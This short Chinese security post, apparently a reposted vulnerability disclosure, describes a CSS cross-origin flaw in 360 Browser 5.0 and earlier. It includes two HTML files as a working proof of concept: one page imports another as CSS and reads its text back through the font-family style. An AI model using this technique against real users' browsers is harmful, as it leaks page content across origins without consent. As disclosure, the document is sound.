360浏览器5.0及以下版本存在CSS跨域漏洞下载

来源:黑吧安全网 浏览:811次 时间:2014-05-22
做网站找雨过天晴工作室

360浏览器5.0及以下版本#存在CSS跨域漏洞
虽然不是最新版,但也有很多用户在用- -.360浏览器5.0及以下版本#存在CSS跨域漏洞

下载了360浏览器5.0正式版测试了下- -.

3.0等等也存在同样的漏洞,我就拿5.0开刀吧- -.

构造两个本地的页面:

 

test.html



 

<html>
<head>
<title>test</title>
</head>
<body>
{}body{font-family:
WooYun
</body>
</html>



 

test2.html



 

<html>
<head>
<title>test2</title>
</head>
<body>
<style>
@import url("C:\Users\Administrator\Desktop\test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
</body>
</html>





用360浏览器5.0访问下test2.html


在test2.html 中通过@import加载了 test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test.html的页面内容

修复方案:

弄补丁吧,呵呵